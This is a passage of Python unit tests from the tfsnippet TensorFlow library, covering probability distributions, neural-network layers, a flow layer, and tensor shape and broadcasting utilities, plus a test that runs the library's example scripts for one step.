check_sample_group_ndims(1)
check_sample_group_ndims(0, compute_density=False)
check_sample_group_ndims(1, compute_density=False)
check_sample_group_ndims(0, compute_density=True)
check_sample_group_ndims(1, compute_density=True)
def test_value_ndims_0(self):
self.do_check_mixture(
lambda: Normal(
mean=np.random.normal(size=[4, 5]).astype(np.float64),
logstd=np.random.normal(size=[4, 5]).astype(np.float64)
),
value_ndims=0,
batch_shape=[4, 5],
is_continuous=True,
dtype=tf.float64,
logits_dtype=np.float64,
is_reparameterized=True
)
def test_value_ndims_1(self):
self.do_check_mixture(
lambda: OnehotCategorical(
logits=np.random.normal(size=[4, 5, 7]).astype(np.float32),
dtype=tf.int32
),
value_ndims=1,
batch_shape=[4, 5],
is_continuous=False,
dtype=tf.int32,
logits_dtype=np.float32,
is_reparameterized=False
)
```
#### File: tests/distributions/test_utils.py
```python
import pytest
import six
import numpy as np
import tensorflow as tf
from tfsnippet.distributions import reduce_group_ndims
if six.PY2:
LONG_MAX = (long(1) << 63) - long(1)
else:
LONG_MAX = (1 << 63) - 1
class ReduceGroupNdimsTestCase(tf.test.TestCase):
def test_errors(self):
for o in [object(), None, 1.2, LONG_MAX,
tf.constant(1.2, dtype=tf.float32),
tf.constant(LONG_MAX, dtype=tf.int64)]:
with pytest.raises(
TypeError,
match='group_ndims cannot be converted to int32'):
_ = reduce_group_ndims(tf.reduce_sum, tf.constant(0.), o)
with pytest.raises(
ValueError, match='group_ndims must be non-negative'):
_ = reduce_group_ndims(tf.reduce_sum, tf.constant(0.), -1)
with self.test_session():
with pytest.raises(
Exception, match='group_ndims must be non-negative'):
_ = reduce_group_ndims(tf.reduce_sum, tf.constant(0.),
tf.constant(-1, dtype=tf.int32)).eval()
def test_output(self):
tensor = tf.reshape(tf.range(24, dtype=tf.float32), [2, 3, 4])
tensor_sum_1 = tf.reduce_sum(tensor, axis=-1)
tensor_sum_2 = tf.reduce_sum(tensor, axis=[-2, -1])
tensor_prod = tf.reduce_prod(tensor, axis=-1)
g0 = tf.constant(0, dtype=tf.int32)
g1 = tf.constant(1, dtype=tf.int32)
g2 = tf.constant(2, dtype=tf.int32)
with self.test_session():
# static group_ndims
np.testing.assert_equal(
tensor.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, 0).eval()
)
np.testing.assert_equal(
tensor_sum_1.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, 1).eval()
)
np.testing.assert_equal(
tensor_sum_2.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, 2).eval()
)
np.testing.assert_equal(
tensor_prod.eval(),
reduce_group_ndims(tf.reduce_prod, tensor, 1).eval()
)
# dynamic group_ndims
np.testing.assert_equal(
tensor.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, g0).eval()
)
np.testing.assert_equal(
tensor_sum_1.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, g1).eval()
)
np.testing.assert_equal(
tensor_sum_2.eval(),
reduce_group_ndims(tf.reduce_sum, tensor, g2).eval()
)
np.testing.assert_equal(
tensor_prod.eval(),
reduce_group_ndims(tf.reduce_prod, tensor, g1).eval()
)
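# For reference (illustrative summary of the behaviour exercised above):
# reduce_group_ndims(op, tensor, k) applies `op` over the last k axes, so
# k=1 reduces axis -1, k=2 reduces axes [-2, -1], and k=0 returns the
# tensor unchanged.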
```
#### File: tests/examples/test_examples.py
```python
import codecs
import copy
import os
import re
import subprocess
import sys
import time
import unittest
from tfsnippet.utils import TemporaryDirectory, humanize_duration
from tests.examples.helper import skipUnlessRunExamplesTests
class ExamplesTestCase(unittest.TestCase):
"""
Test case to ensure all examples can run for at least one step.
"""
@skipUnlessRunExamplesTests()
def test_examples_can_run_one_step(self):
timer = -time.time()
# discover all example scripts
def walk(pa, dst):
for fn in os.listdir(pa):
fp = os.path.join(pa, fn)
if os.path.isdir(fp):
walk(fp, dst)
elif fp.endswith('.py'):
with codecs.open(fp, 'rb', 'utf-8') as f:
cnt = f.read()
if re.search(
r'''if\s+__name__\s*==\s+(['"])__main__\1:''',
cnt):
if 'max_step=config.max_step' not in cnt:
raise RuntimeError('Example script does not have '
'max_step configuration: {}'.
format(fp))
dst.append(fp)
return dst
examples_dir = os.path.join(
os.path.split(os.path.abspath(__file__))[0],
'../../tfsnippet/examples'
)
examples_scripts = walk(examples_dir, [])
# run all examples scripts for just max_step
env_dict = copy.copy(os.environ)
for example_script in examples_scripts:
print('Run {} ...'.format(example_script))
with TemporaryDirectory() as tempdir:
args = [sys.executable, '-u',
example_script, '--max_step=1']
subprocess.check_call(args, cwd=tempdir, env=env_dict)
print('')
# report finished tests
print('Finished running {} example scripts in {}.'.format(
len(examples_scripts), humanize_duration(time.time() + timer)))
```
#### File: tfsnippet-jill/tests/helper.py
```python
import tensorflow as tf
__all__ = ['assert_variables']
def assert_variables(names, exist=True, trainable=None, scope=None,
collections=None):
"""
Assert that the variables given by `names` meet certain criteria.
Args:
names (Iterable[str]): Name, or names.
exist (bool): Assert variables exist or not.
trainable: Assert variables are trainable or not.
scope (None or str): The scope prefix to be prepended to the names.
collections (Iterable[str]): Additional graph collections, where
to ensure the variables are in.
"""
def normalize_name(n):
return n.rsplit(':', 1)[0]
names = tuple(names)
if scope:
scope = str(scope).rstrip('/')
names = tuple('{}/{}'.format(scope, name) for name in names)
global_vars = {normalize_name(v.name): v
for v in tf.global_variables()}
trainable_vars = {normalize_name(v.name): v
for v in tf.trainable_variables()}
collections = list(collections or ())
collection_vars = [
{normalize_name(v.name): v for v in tf.get_collection(c)}
for c in collections
]
for name in names:
if exist:
if name not in global_vars:
raise AssertionError('Variable `{}` is expected to exist, but '
'turned out not to exist.'.format(name))
# check trainable
if trainable is False:
if name in trainable_vars:
raise AssertionError('Variable `{}` is expected not to be '
'trainable, but turned out to be '
'trainable'.format(name))
elif trainable is True:
if name not in trainable_vars:
raise AssertionError('Variable `{}` is expected to be '
'trainable, but turned out not to be '
'trainable'.format(name))
# check collections
for coll, coll_vars in zip(collections, collection_vars):
if name not in coll_vars:
raise AssertionError('Variable `{}` is expected to be '
'in the collection `{}`, but turned '
'out not.'.format(name, coll))
else:
if name in global_vars:
raise AssertionError('Variable `{}` is expected not to exist, '
'but turned out to exist.'.format(name))
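# Typical usage, as in tests/layers/core/test_dense.py in this repository:
# after building a `dense` layer, check that it created trainable `kernel`
# and `bias` variables under its scope and registered them as model variables:
#
#   assert_variables(['kernel', 'bias'], trainable=True, scope='dense',
#                    collections=[tf.GraphKeys.MODEL_VARIABLES])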
```
#### File: layers/core/test_dense.py
```python
import numpy as np
import tensorflow as tf
from tests.helper import assert_variables
from tests.layers.helper import l2_normalize
from tests.layers.core.test_gated import safe_sigmoid
from tfsnippet.layers import dense
from tfsnippet.utils import get_static_shape
class DenseTestCase(tf.test.TestCase):
def test_linear(self):
np.random.seed(1234)
kernel = np.random.normal(size=(5, 3)).astype(np.float64)
bias = np.random.normal(size=(3,)).astype(np.float64)
x = np.random.normal(size=(11, 7, 5)).astype(np.float64)
with self.test_session() as sess:
# test 2d input
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x[0]), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias)
)
),
np.dot(x[0], kernel) + bias,
rtol=1e-5
)
# test 3d input
ans = np.dot(x, kernel) + bias
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias)
)
),
ans,
rtol=1e-5
)
# test dynamic batch and sampling size
ph = tf.placeholder(dtype=tf.float64, shape=(None, None, 5))
np.testing.assert_allclose(
sess.run(
dense(
ph, 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias)
),
feed_dict={ph: x}
),
ans,
rtol=1e-5
)
# test use_bias is False
ans = np.dot(x, kernel)
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
use_bias=False
)
),
ans,
rtol=1e-5
)
# test create variables
with tf.Graph().as_default():
_ = dense(tf.constant(x, dtype=tf.float64), 3)
assert_variables(['kernel', 'bias'], trainable=True, scope='dense',
collections=[tf.GraphKeys.MODEL_VARIABLES])
kernel_var = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)[-2]
bias_var = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)[-1]
self.assertEqual(get_static_shape(kernel_var), kernel.shape)
self.assertEqual(get_static_shape(bias_var), bias.shape)
# test create variables, non-trainable
with tf.Graph().as_default():
_ = dense(tf.constant(x, dtype=tf.float64), 3, trainable=False)
assert_variables(['kernel', 'bias'], trainable=False, scope='dense',
collections=[tf.GraphKeys.MODEL_VARIABLES])
# test create variables, use_bias is False
with tf.Graph().as_default():
_ = dense(tf.constant(x, dtype=tf.float64), 3, use_bias=False)
assert_variables(['kernel'], trainable=True, scope='dense',
collections=[tf.GraphKeys.MODEL_VARIABLES])
assert_variables(['bias'], exist=False, scope='dense')
def test_normalization_and_activation(self):
np.random.seed(1234)
kernel = np.random.normal(size=(5, 3)).astype(np.float64)
bias = np.random.normal(size=(3,)).astype(np.float64)
x = np.random.normal(size=(11, 7, 5)).astype(np.float64)
normalizer_fn = lambda x: x * 2. + 1.
activation_fn = lambda x: x * 1.5 - 3.
self.assertGreater(
np.min(np.abs(normalizer_fn(activation_fn(x)) -
activation_fn(normalizer_fn(x)))),
1.
)
with self.test_session() as sess:
# test weight_norm + normalizer + activation
normalized_kernel = l2_normalize(kernel, axis=0)
ans = activation_fn(normalizer_fn(np.dot(x, normalized_kernel)))
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
weight_norm=True
)
),
ans,
rtol=1e-5
)
# test weight_norm + normalizer + activation, use_bias is True
ans = activation_fn(
normalizer_fn(np.dot(x, normalized_kernel) + bias))
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
weight_norm=True,
use_bias=True
)
),
ans,
rtol=1e-5
)
def test_gated(self):
np.random.seed(1234)
kernel = np.random.normal(size=(5, 6)).astype(np.float64)
bias = np.random.normal(size=(6,)).astype(np.float64)
x = np.random.normal(size=(11, 7, 5)).astype(np.float64)
normalizer_fn = lambda x: x * 2. + 1.
activation_fn = lambda x: x * 1.5 - 3.
self.assertGreater(
np.min(np.abs(normalizer_fn(activation_fn(x)) -
activation_fn(normalizer_fn(x)))),
1.
)
with self.test_session() as sess:
normalized_kernel = l2_normalize(kernel, axis=0)
output, gate = np.split(
normalizer_fn(np.dot(x, normalized_kernel)), 2, axis=-1)
ans = activation_fn(output) * safe_sigmoid(gate + 1.1)
self.assertEqual(ans.shape, (11, 7, 3))
np.testing.assert_allclose(
sess.run(
dense(
tf.constant(x, dtype=tf.float64), 3,
kernel=tf.constant(kernel),
bias=tf.constant(bias),
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
weight_norm=True,
gated=True,
gate_sigmoid_bias=1.1
)
),
ans,
rtol=1e-5
)
```
#### File: layers/core/test_gated.py
```python
import copy
import numpy as np
import pytest
import tensorflow as tf
from tfsnippet.layers import as_gated
def safe_sigmoid(x):
return np.where(x < 0, np.exp(x) / (1. + np.exp(x)), 1. / (1. + np.exp(-x)))
class AsGatedHelper(object):
def __init__(self, main_ret, gate_ret):
self.main_args = None
self.gate_args = None
self.main_ret = main_ret
self.gate_ret = gate_ret
def __call__(self, *args, **kwargs):
scope = kwargs['scope']
if scope == 'main':
assert(self.main_args is None)
self.main_args = (args, copy.copy(kwargs))
return self.main_ret
elif scope == 'gate':
assert(self.gate_args is None)
self.gate_args = (args, copy.copy(kwargs))
return self.gate_ret
else:
raise RuntimeError()
class TestAsGated(tf.test.TestCase):
def test_as_gated(self):
main_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
gate_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
activation_fn = object()
# default_name infer failed
with pytest.raises(ValueError,
match='`default_name` cannot be inferred'):
g = as_gated(AsGatedHelper(main_ret, gate_ret))
with self.test_session() as sess:
# test infer default name
f = AsGatedHelper(main_ret, gate_ret)
f.__name__ = 'f'
g = as_gated(f)
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'gated_f/')
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test specify default name
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, sigmoid_bias=1., default_name='ff')
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 1.))
self.assertTrue(g_ret.name, 'gated_ff/')
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test using `name`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, name='name')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'name/')
# test using `scope`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, scope='scope')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
self.assertTrue(g_ret.name, 'scope/')
```
#### File: layers/flows/test_rearrangement.py
```python
import numpy as np
import tensorflow as tf
from tests.helper import assert_variables
from tests.layers.flows.helper import invertible_flow_standard_check
from tfsnippet.layers import FeatureShufflingFlow
class FeatureShufflingFlowTestCase(tf.test.TestCase):
def test_feature_shuffling_flow(self):
np.random.seed(1234)
with self.test_session() as sess:
# axis = -1, value_ndims = 1
x = np.random.normal(size=[3, 4, 5, 6]).astype(np.float32)
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, None, None, 6])
permutation = np.arange(6, dtype=np.int32)
np.random.shuffle(permutation)
y = x[..., permutation]
log_det = np.zeros([3, 4, 5]).astype(np.float32)
layer = FeatureShufflingFlow(axis=-1, value_ndims=1)
y_out, log_det_out = layer.transform(x_ph)
sess.run(tf.assign(layer._permutation, permutation))
y_out, log_det_out = sess.run(
[y_out, log_det_out], feed_dict={x_ph: x})
np.testing.assert_equal(y_out, y)
np.testing.assert_equal(log_det_out, log_det)
invertible_flow_standard_check(
self, layer, sess, x_ph, feed_dict={x_ph: x})
assert_variables(['permutation'], trainable=False,
scope='feature_shuffling_flow',
collections=[tf.GraphKeys.MODEL_VARIABLES])
# axis = -2, value_ndims = 3
x = np.random.normal(size=[3, 4, 5, 6]).astype(np.float32)
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, None, 5, None])
permutation = np.arange(5, dtype=np.int32)
np.random.shuffle(permutation)
y = x[..., permutation, :]
log_det = np.zeros([3]).astype(np.float32)
layer = FeatureShufflingFlow(axis=-2, value_ndims=3)
y_out, log_det_out = layer.transform(x_ph)
sess.run(tf.assign(layer._permutation, permutation))
y_out, log_det_out = sess.run(
[y_out, log_det_out], feed_dict={x_ph: x})
np.testing.assert_equal(y_out, y)
np.testing.assert_equal(log_det_out, log_det)
invertible_flow_standard_check(
self, layer, sess, x_ph, feed_dict={x_ph: x})
```
#### File: tests/layers/test_initialization.py
```python
import tensorflow as tf
from tfsnippet.layers import *
class DefaultKernelInitializerTestCase(tf.test.TestCase):
def test_default_kernel_initializer(self):
i = default_kernel_initializer(weight_norm=True)
self.assertEqual(i.stddev, .05)
i = default_kernel_initializer(weight_norm=(lambda t: t))
self.assertEqual(i.stddev, .05)
i = default_kernel_initializer(weight_norm=False)
self.assertFalse(hasattr(i, 'stddev'))
i = default_kernel_initializer(weight_norm=None)
self.assertFalse(hasattr(i, 'stddev'))
```
#### File: tests/ops/test_evaluation.py
```python
import numpy as np
import tensorflow as tf
from tfsnippet.ops import bits_per_dimension
class BitsPerDimensionTestCase(tf.test.TestCase):
def test_bits_per_dimension(self):
with self.test_session() as sess:
log_p = np.random.normal(size=[2, 3, 4, 5])
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1., scale=None)),
-log_p / np.log(2)
)
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1024 * 3, scale=None)),
-log_p / (np.log(2) * 1024 * 3)
)
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1., scale=256.)),
-(log_p - np.log(256)) / np.log(2)
)
np.testing.assert_allclose(
sess.run(bits_per_dimension(log_p, 1024 * 3, scale=256)),
-(log_p - np.log(256) * 1024 * 3) / (np.log(2) * 1024 * 3)
)
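# The assertions above correspond to the usual bits-per-dimension formula,
# written out here for reference (D is the second argument, e.g. 1024 * 3):
#   bpd = -(log_p - D * log(scale)) / (D * log(2))   when a scale is given
#   bpd = -log_p / (D * log(2))                      when scale is None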
```
#### File: tests/ops/test_shape_utils.py
```python
import numpy as np
import pytest
import tensorflow as tf
from tfsnippet.ops import *
from tfsnippet.utils import get_static_shape
class PrependDimsTestCase(tf.test.TestCase):
def test_prepend_dims(self):
with pytest.raises(ValueError, match='`ndims` must be >= 0: got -1'):
_ = prepend_dims(tf.constant(0.), ndims=-1)
x = tf.zeros([2, 3])
self.assertIs(prepend_dims(x, ndims=0), x)
with self.test_session() as sess:
# test static shape
x = np.random.normal(size=[2, 3])
y = prepend_dims(x, ndims=1)
self.assertEqual(get_static_shape(y), (1, 2, 3))
np.testing.assert_allclose(sess.run(y), x.reshape([1, 2, 3]))
# test partially dynamic shape
t = tf.placeholder(shape=[2, None], dtype=tf.float64)
y = prepend_dims(t, ndims=2)
self.assertEqual(get_static_shape(y), (1, 1, 2, None))
np.testing.assert_allclose(
sess.run(y, feed_dict={t: x}), x.reshape([1, 1, 2, 3]))
# test fully dynamic shape
t = tf.placeholder(shape=None, dtype=tf.float64)
y = prepend_dims(t, ndims=3)
self.assertEqual(get_static_shape(y), None)
np.testing.assert_allclose(
sess.run(y, feed_dict={t: x}), x.reshape([1, 1, 1, 2, 3]))
class FlattenUnflattenTestCase(tf.test.TestCase):
def test_flatten_and_unflatten(self):
def run_check(x, k, dynamic_shape):
if dynamic_shape:
t = tf.placeholder(tf.int32, [None] * len(x.shape))
run = lambda sess, *args: sess.run(*args, feed_dict={t: x})
else:
t = tf.constant(x, dtype=tf.int32)
run = lambda sess, *args: sess.run(*args)
if len(x.shape) == k:
self.assertEqual(flatten_to_ndims(t, k), (t, None, None))
self.assertEqual(unflatten_from_ndims(t, None, None), t)
else:
if k == 1:
front_shape = tuple(x.shape)
static_front_shape = get_static_shape(t)
xx = x.reshape([-1])
else:
front_shape = tuple(x.shape)[: -(k-1)]
static_front_shape = get_static_shape(t)[: -(k - 1)]
xx = x.reshape([-1] + list(x.shape)[-(k-1):])
with self.test_session() as sess:
tt, s1, s2 = flatten_to_ndims(t, k)
self.assertEqual(s1, static_front_shape)
if not dynamic_shape:
self.assertEqual(s2, front_shape)
else:
self.assertEqual(tuple(run(sess, s2)), front_shape)
np.testing.assert_equal(run(sess, tt), xx)
np.testing.assert_equal(
run(sess, unflatten_from_ndims(tt, s1, s2)),
x
)
x = np.arange(120).reshape([2, 3, 4, 5]).astype(np.int32)
run_check(x, 1, dynamic_shape=False)
run_check(x, 1, dynamic_shape=True)
run_check(x, 2, dynamic_shape=False)
run_check(x, 2, dynamic_shape=True)
run_check(x, 3, dynamic_shape=False)
run_check(x, 3, dynamic_shape=True)
run_check(x, 4, dynamic_shape=False)
run_check(x, 4, dynamic_shape=True)
def test_flatten_errors(self):
with pytest.raises(ValueError,
match='`k` must be greater or equal to 1'):
_ = flatten_to_ndims(tf.constant(0.), 0)
with pytest.raises(ValueError,
match='`x` is required to have known number of '
'dimensions'):
_ = flatten_to_ndims(tf.placeholder(tf.float32, None), 1)
with pytest.raises(ValueError,
match='`k` is 2, but `x` only has rank 1'):
_ = flatten_to_ndims(tf.zeros([3]), 2)
def test_unflatten_errors(self):
with pytest.raises(ValueError,
match='`x` is required to have known number of '
'dimensions'):
_ = unflatten_from_ndims(tf.placeholder(tf.float32, None), (1,), (1,))
with pytest.raises(ValueError,
match='`x` only has rank 0, required at least 1'):
_ = unflatten_from_ndims(tf.constant(0.), (1,), (1,))
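# For reference (illustrative summary of the behaviour exercised above):
# flatten_to_ndims collapses all leading axes into one, e.g. a [2, 3, 4, 5]
# tensor flattened to ndims=2 becomes [24, 5], and unflatten_from_ndims
# restores the original shape using the recorded static/dynamic front shapes.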
class BroadcastTestCase(tf.test.TestCase):
def test_broadcast_to_shape(self):
def check(x, shape, x_ph=None, shape_ph=None, static_shape=None):
# compute the expected answer
try:
y = x * np.ones(tuple(shape), dtype=x.dtype)
if len(shape) and y.shape[-len(shape):] != shape:
raise ValueError()
except ValueError:
y = None
# call the function and get output
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if shape_ph is not None:
feed_dict[shape_ph] = np.asarray(shape)
shape = shape_ph
if y is None:
with pytest.raises(Exception, match='`x` cannot be broadcasted '
'to match `shape`'):
t = broadcast_to_shape(x, shape)
_ = sess.run(t, feed_dict=feed_dict)
else:
t = broadcast_to_shape(x, shape)
if static_shape is not None:
self.assertTupleEqual(get_static_shape(t), static_shape)
out = sess.run(t, feed_dict=feed_dict)
self.assertTupleEqual(out.shape, y.shape)
np.testing.assert_equal(out, y)
with self.test_session() as sess:
np.random.seed(1234)
x = np.random.random([2, 1, 3]).astype(np.float32)
# -- fully static shapes --
# good cases
check(x, (3, 2, 5, 3), static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), static_shape=(2, 5, 3))
check(x, (5, 3), static_shape=(2, 5, 3))
# error cases
check(x, (1, 1, 1, 1))
check(x, (1, 1, 1))
check(x, (1, 1))
# -- partially dynamic shapes on broadcast axis --
x_ph = tf.placeholder(shape=(2, None, 3), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
check(x, (5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- partially dynamic shapes on non-broadcast axis --
x_ph = tf.placeholder(shape=(None, 1, 3), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
check(x, (5, 3), x_ph=x_ph, static_shape=(None, 5, 3))
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- partially dynamic shapes on all axis --
x_ph = tf.placeholder(shape=(None, None, None), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
check(x, (5, 3), x_ph=x_ph, static_shape=(None, 5, 3))
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- fully dynamic shapes --
x_ph = tf.placeholder(shape=None, dtype=tf.float32)
shape_ph = tf.placeholder(shape=None, dtype=tf.int32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (5, 3), x_ph=x_ph, shape_ph=shape_ph)
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1), x_ph=x_ph, shape_ph=shape_ph)
def test_broadcast_to_shape_strict(self):
def check(x, shape, x_ph=None, shape_ph=None, static_shape=None):
# compute the expected answer
try:
y = x * np.ones(tuple(shape), dtype=x.dtype)
if y.shape != shape:
raise ValueError()
except ValueError:
y = None
# call the function and get output
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if shape_ph is not None:
feed_dict[shape_ph] = np.asarray(shape)
shape = shape_ph
if y is None:
with pytest.raises(Exception, match='`x` cannot be broadcasted '
'to match `shape`'):
t = broadcast_to_shape_strict(x, shape)
_ = sess.run(t, feed_dict=feed_dict)
else:
t = broadcast_to_shape_strict(x, shape)
if static_shape is not None:
self.assertTupleEqual(get_static_shape(t), static_shape)
out = sess.run(t, feed_dict=feed_dict)
self.assertTupleEqual(out.shape, y.shape)
np.testing.assert_equal(out, y)
with self.test_session() as sess:
np.random.seed(1234)
x = np.random.random([2, 1, 3]).astype(np.float32)
# -- fully static shapes --
# good cases
check(x, (3, 2, 5, 3), static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), static_shape=(2, 5, 3))
# bad cases
check(x, (5, 3))
check(x, (1, 1, 1, 1))
check(x, (1, 1, 1))
check(x, (1, 1))
# -- partially dynamic shapes on all axis --
x_ph = tf.placeholder(shape=(None, None, None), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
# error cases
check(x, (5, 3), x_ph=x_ph)
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- fully dynamic shapes on x --
x_ph = tf.placeholder(shape=None, dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph)
check(x, (2, 5, 3), x_ph=x_ph)
# error cases
check(x, (5, 3), x_ph=x_ph)
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- fully dynamic shapes on both x and shape --
x_ph = tf.placeholder(shape=None, dtype=tf.float32)
shape_ph = tf.placeholder(shape=None, dtype=tf.int32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
# error cases
check(x, (5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1), x_ph=x_ph, shape_ph=shape_ph)
class BroadcastConcatTestCase(tf.test.TestCase):
def test_broadcast_concat(self):
a_ph = tf.placeholder(dtype=tf.float32, shape=[None, 3, 1, None, 1])
b_ph = tf.placeholder(dtype=tf.float32, shape=[6, None, 1, 5, 7, None])
ph = tf.placeholder(dtype=tf.float32, shape=None)
def check(x, y, axis, static_shape):
ndims = max(len(x.shape), len(y.shape))
xx = np.reshape(x, [1] * (ndims - len(x.shape)) + list(x.shape))
yy = np.reshape(y, [1] * (ndims - len(y.shape)) + list(y.shape))
if axis < 0:
axis += ndims
b_shape = [1] * ndims
for i in range(ndims):
if i != axis:
b_shape[i] = max(xx.shape[i], yy.shape[i])
xx = xx * np.ones(b_shape)
yy = yy * np.ones(b_shape)
ans = np.concatenate([xx, yy], axis=axis)
out = broadcast_concat(a_ph, b_ph, axis=axis)
self.assertEqual(get_static_shape(out), static_shape)
np.testing.assert_allclose(
sess.run(out, feed_dict={a_ph: x, b_ph: y}),
ans
)
with self.test_session() as sess:
# test can broadcast
static_shapes = [
(7, None, 3, 5, 7, None),
(6, None, 3, 5, 7, None),
(6, None, 4, 5, 7, None),
(6, None, 3, 6, 7, None),
(6, None, 3, 5, None, None),
(6, None, 3, 5, 7, None)
] * 2
for axis, static_shape in zip(
[-6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5], static_shapes):
check(
np.random.normal(size=[4, 3, 1, 7, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 8]),
axis=axis,
static_shape=static_shape
)
for axis in [-5, 1]:
check(
np.random.normal(size=[1, 3, 1, 7, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 8]),
axis=axis,
static_shape=(6, None, 3, 5, 7, None)
)
for axis in [-2, 4]:
check(
np.random.normal(size=[4, 3, 1, 1, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 8]),
axis=axis,
static_shape=(6, None, 3, 5, None, None)
)
for axis in [-1, 5]:
check(
np.random.normal(size=[4, 3, 1, 7, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 1]),
axis=axis,
static_shape=(6, None, 3, 5, 7, None)
)
# test cannot broadcast
with pytest.raises(ValueError, match='`x` with non-deterministic '
'shape is not supported'):
_ = broadcast_concat(ph, b_ph, axis=0)
with pytest.raises(ValueError, match='`y` with non-deterministic '
'shape is not supported'):
_ = broadcast_concat(a_ph, ph, axis=0)
with pytest.raises(ValueError, match='Invalid axis: must >= -6 and '
'<= 5, got -7'):
_ = broadcast_concat(a_ph, b_ph, axis=-7)
